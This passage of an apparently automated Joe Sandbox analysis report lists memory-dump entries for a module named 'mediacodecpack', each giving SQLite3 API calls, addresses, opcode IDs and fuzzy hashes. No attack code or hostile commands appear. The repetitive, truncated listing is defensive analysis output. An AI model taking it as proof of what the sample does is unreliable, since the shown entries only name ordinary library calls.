                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_column_int64sqlite3_mutex_entersqlite3_mutex_leavesqlite3_resetsqlite3_step
                                                                                        • String ID:
                                                                                        • API String ID: 3429445273-0
                                                                                        • Opcode ID: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
                                                                                        • Instruction ID: 62863439de2fabb71fd3664abc4fbfc11ff04353a6e6e3e42574d1c19fb7889d
                                                                                        • Opcode Fuzzy Hash: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
                                                                                        • Instruction Fuzzy Hash: AE316470A183408BEF15CF69C1C5749FBA6AFA7348F188599DC864F30AD375D884C752
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_snprintf$sqlite3_stricmpsqlite3_value_text
                                                                                        • String ID:
                                                                                        • API String ID: 1035992805-0
                                                                                        • Opcode ID: 213593095aed0ecc64844f89ed1f3878beaaf7633e295caa013ed5846923251b
                                                                                        • Instruction ID: 84d28b158f1a11e063f70be148de9c7b2eff514b3bcf7808f17aa895500be78a
                                                                                        • Opcode Fuzzy Hash: 213593095aed0ecc64844f89ed1f3878beaaf7633e295caa013ed5846923251b
                                                                                        • Instruction Fuzzy Hash: 8C3178B0A08324DFEB24CF28C481B4ABBF6FBA5318F04C499E4888B251C775D885DF42
                                                                                        APIs
                                                                                        • sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 609034D8
                                                                                        • sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903521
                                                                                        • sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 6090354A
                                                                                        • sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903563
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                        • String ID:
                                                                                        • API String ID: 1477753154-0
                                                                                        • Opcode ID: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
                                                                                        • Instruction ID: 848dca46e936c6e01d33e08870ae11aa620bd8b24bdb606da7ea596206f2e213
                                                                                        • Opcode Fuzzy Hash: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
                                                                                        • Instruction Fuzzy Hash: 44111F726186218FDB00EF7DC8817597FEAFB66308F00842DE865E7362E779D8819741
                                                                                        APIs
                                                                                        • sqlite3_initialize.SQLITE3 ref: 6092A450
                                                                                          • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                        • sqlite3_mutex_enter.SQLITE3 ref: 6092A466
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
                                                                                        • sqlite3_memory_used.SQLITE3 ref: 6092A4BA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_mutex_enter$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_leave
                                                                                        • String ID:
                                                                                        • API String ID: 2673540737-0
                                                                                        • Opcode ID: 58333c90df1895ca2798dafcbab41657529afc007f85020e925d8580cfdcdfcb
                                                                                        • Instruction ID: c4988029ba64cfb2248a7cf0c790324acf4c13eb0f9cd3f15fdedc175ef3c91a
                                                                                        • Opcode Fuzzy Hash: 58333c90df1895ca2798dafcbab41657529afc007f85020e925d8580cfdcdfcb
                                                                                        • Instruction Fuzzy Hash: F9019276E143148BCB00EF79D88561ABFE7FBA5324F008528EC9497364E735DC408B81
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_value_text$sqlite3_freesqlite3_load_extension
                                                                                        • String ID:
                                                                                        • API String ID: 3526213481-0
                                                                                        • Opcode ID: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
                                                                                        • Instruction ID: 98199466554994e62e20ad809be6129e3c08b78dd6d8c38fc18f61524e73aad2
                                                                                        • Opcode Fuzzy Hash: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
                                                                                        • Instruction Fuzzy Hash: 4101E9B5A043059BCB00EF69D485AAFBBF5EF68654F10C529EC9497304E774D841CF91
                                                                                        APIs
                                                                                        • sqlite3_prepare.SQLITE3 ref: 60969166
                                                                                        • sqlite3_errmsg.SQLITE3 ref: 60969172
                                                                                          • Part of subcall function 609258A8: sqlite3_log.SQLITE3 ref: 609258E5
                                                                                        • sqlite3_errcode.SQLITE3 ref: 6096918A
                                                                                          • Part of subcall function 609251AA: sqlite3_log.SQLITE3 ref: 609251E8
                                                                                        • sqlite3_step.SQLITE3 ref: 60969197
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_log$sqlite3_errcodesqlite3_errmsgsqlite3_preparesqlite3_step
                                                                                        • String ID:
                                                                                        • API String ID: 2877408194-0
                                                                                        • Opcode ID: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
                                                                                        • Instruction ID: d4ebd4c9a05a553e526e78eaaf80584f3afcfe73b3175c4c6dada352db343273
                                                                                        • Opcode Fuzzy Hash: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
                                                                                        • Instruction Fuzzy Hash: 9F0186B091C3059BE700EF29C88525DFBE9EFA5314F11892DA89987384E734C940CB86
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_freesqlite3_mprintfsqlite3_value_blobsqlite3_value_bytes
                                                                                        • String ID:
                                                                                        • API String ID: 1163609955-0
                                                                                        • Opcode ID: c446836a4840d302dbdc97fcf3f25a19881b43244be54ce00609cbc101420811
                                                                                        • Instruction ID: 8e0d1a1b7fe9adeaf330fda5a565ce202833de3a42fcd494fa905fee92021967
                                                                                        • Opcode Fuzzy Hash: c446836a4840d302dbdc97fcf3f25a19881b43244be54ce00609cbc101420811
                                                                                        • Instruction Fuzzy Hash: F6F0C8716282145FC3106F3994816697BE6DFA6758F0144A9F584CB314DB75CC82C742
                                                                                        APIs
                                                                                        • sqlite3_prepare_v2.SQLITE3 ref: 609615BA
                                                                                        • sqlite3_step.SQLITE3 ref: 609615C9
                                                                                        • sqlite3_column_int.SQLITE3 ref: 609615E1
                                                                                          • Part of subcall function 6091D4F4: sqlite3_value_int.SQLITE3 ref: 6091D50C
                                                                                        • sqlite3_finalize.SQLITE3 ref: 609615EE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_column_intsqlite3_finalizesqlite3_prepare_v2sqlite3_stepsqlite3_value_int
                                                                                        • String ID:
                                                                                        • API String ID: 4265739436-0
                                                                                        • Opcode ID: edb1a347b7ee41d63e69a54b369763b34702b79c0c254a7699785c0090147395
                                                                                        • Instruction ID: 970f7a8085286b868af170b9ae73916577c28f03d50975cfa6e3c5bd991c66ad
                                                                                        • Opcode Fuzzy Hash: edb1a347b7ee41d63e69a54b369763b34702b79c0c254a7699785c0090147395
                                                                                        • Instruction Fuzzy Hash: BE01E4B0D083049BEB10EF69C58575EFBF9EFA5314F00896DE8A997380E775D9408B82
                                                                                        APIs
                                                                                        • sqlite3_initialize.SQLITE3 ref: 6092A638
                                                                                          • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                        • sqlite3_mutex_enter.SQLITE3 ref: 6092A64F
                                                                                        • strcmp.MSVCRT ref: 6092A66A
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 6092A67D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_mutex_enter$sqlite3_initializesqlite3_mutex_leavestrcmp
                                                                                        • String ID:
                                                                                        • API String ID: 1894734062-0
                                                                                        • Opcode ID: 1480f87154849f1cdf239baa72c9ff1b5e3c835899009c68b4affe8256d9fce5
                                                                                        • Instruction ID: 0dacd04717b96a229033e5bf385d74358d6efc238696297f04088f4a0acd15ee
                                                                                        • Opcode Fuzzy Hash: 1480f87154849f1cdf239baa72c9ff1b5e3c835899009c68b4affe8256d9fce5
                                                                                        • Instruction Fuzzy Hash: EBF0B4726243044BC7006F799CC164A7FAEEEB1298B05802CEC548B319EB35DC0297A1
                                                                                        APIs
                                                                                        • sqlite3_mutex_enter.SQLITE3 ref: 609084E9
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 60908518
                                                                                        • sqlite3_mutex_enter.SQLITE3 ref: 60908528
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 6090855B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                        • String ID:
                                                                                        • API String ID: 1477753154-0
                                                                                        • Opcode ID: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
                                                                                        • Instruction ID: c41a4d3f3efa942db11cbd34a9101edfe28f26dd6f673ba1da0d5803e4a0adbd
                                                                                        • Opcode Fuzzy Hash: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
                                                                                        • Instruction Fuzzy Hash: FD01A4B05093048BDB40AF25C5D97CABBA5EF15718F0884BDEC894F34AD7B9D5448BA1
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_log
                                                                                        • String ID: into$out of
                                                                                        • API String ID: 632333372-1114767565
                                                                                        • Opcode ID: 05e60a680804dc8d75cc30d301a58b6784d3cbcabfb13c7dcba40214300a3b29
                                                                                        • Instruction ID: de20b162988cb891a2f8fbcf22309076e3e21d241eadb06c465d82de9f0e8d92
                                                                                        • Opcode Fuzzy Hash: 05e60a680804dc8d75cc30d301a58b6784d3cbcabfb13c7dcba40214300a3b29
                                                                                        • Instruction Fuzzy Hash: 91910170A043149BDB26CF28C88175EBBBABF65308F0481E9E858AB355D7B5DE85CF41
                                                                                        APIs
                                                                                          • Part of subcall function 60918408: sqlite3_value_text.SQLITE3 ref: 60918426
                                                                                        • sqlite3_free.SQLITE3 ref: 609193A3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_freesqlite3_value_text
                                                                                        • String ID: (NULL)$NULL
                                                                                        • API String ID: 2175239460-873412390
                                                                                        • Opcode ID: 2d639d8f8789be8f4f2115c7e339461789bfa1512606a4b94e85873a15b94a2d
                                                                                        • Instruction ID: 63658e955800b40111a930d2026d12727b3b294c4be858d68b3f7c51d7abf176
                                                                                        • Opcode Fuzzy Hash: 2d639d8f8789be8f4f2115c7e339461789bfa1512606a4b94e85873a15b94a2d
                                                                                        • Instruction Fuzzy Hash: E3514B31F0825A8EEB258A68C89479DBBB6BF66304F1441E9C4A9AB241D7309DC6CF01
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_log
                                                                                        • String ID: string or blob too big$|
                                                                                        • API String ID: 632333372-330586046
                                                                                        • Opcode ID: b6301cf988e6664baaa8b4960c9a349f418ad1f33ca54faa928bbeacb0d503e6
                                                                                        • Instruction ID: 65a9847582dc10a4f4f17f1c4fc8d82f10366072c52f03016cacc5a11d353e3e
                                                                                        • Opcode Fuzzy Hash: b6301cf988e6664baaa8b4960c9a349f418ad1f33ca54faa928bbeacb0d503e6
                                                                                        • Instruction Fuzzy Hash: 4D51B9749083689BCB22CF28C985789BBF6BF59314F1086D9E49897351C775EE81CF41
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_log
                                                                                        • String ID: d$|
                                                                                        • API String ID: 632333372-415524447
                                                                                        • Opcode ID: b41da94c8e0873fb31ce46b9bf1ec845f2d469f37e36bd2a55cc8f8885e561b5
                                                                                        • Instruction ID: dac03e427e93f591f5d1737f90c886445feec93ea56e6f6f32424ebbe55d5cce
                                                                                        • Opcode Fuzzy Hash: b41da94c8e0873fb31ce46b9bf1ec845f2d469f37e36bd2a55cc8f8885e561b5
                                                                                        • Instruction Fuzzy Hash: 50510970A04329DBDB26CF19C981799BBBABF55308F0481D9E958AB341D735EE81CF41
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_log
                                                                                        • String ID: -- $d
                                                                                        • API String ID: 632333372-777087308
                                                                                        • Opcode ID: 04c39e600f9b005651fcb68da317ac4a80b79d2e803021aaf364a84fff9736a0
                                                                                        • Instruction ID: 827f605eab188c5b26b82399601ab0ab65c2dc521f736992582695f4996adf34
                                                                                        • Opcode Fuzzy Hash: 04c39e600f9b005651fcb68da317ac4a80b79d2e803021aaf364a84fff9736a0
                                                                                        • Instruction Fuzzy Hash: 5651F674A042689FDB26CF28C885789BBFABF55304F1081D9E99CAB341C7759E85CF41
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_logsqlite3_value_text
                                                                                        • String ID: string or blob too big
                                                                                        • API String ID: 2320820228-2803948771
                                                                                        • Opcode ID: 4552165c49a92a3f1eebbde7746405f837ee0ef0562a3825501d2540ddfe4a5c
                                                                                        • Instruction ID: 1f8da1134a73d261049fdcd83983d84c916c8a3f87851362e697cdb17b1d2bab
                                                                                        • Opcode Fuzzy Hash: 4552165c49a92a3f1eebbde7746405f837ee0ef0562a3825501d2540ddfe4a5c
                                                                                        • Instruction Fuzzy Hash: F631D9B0A083249BCB25DF28C881799B7FABF69304F0085DAE898A7301D775DE81CF45
                                                                                        APIs
                                                                                        • sqlite3_aggregate_context.SQLITE3 ref: 60914096
                                                                                        • sqlite3_value_numeric_type.SQLITE3 ref: 609140A2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
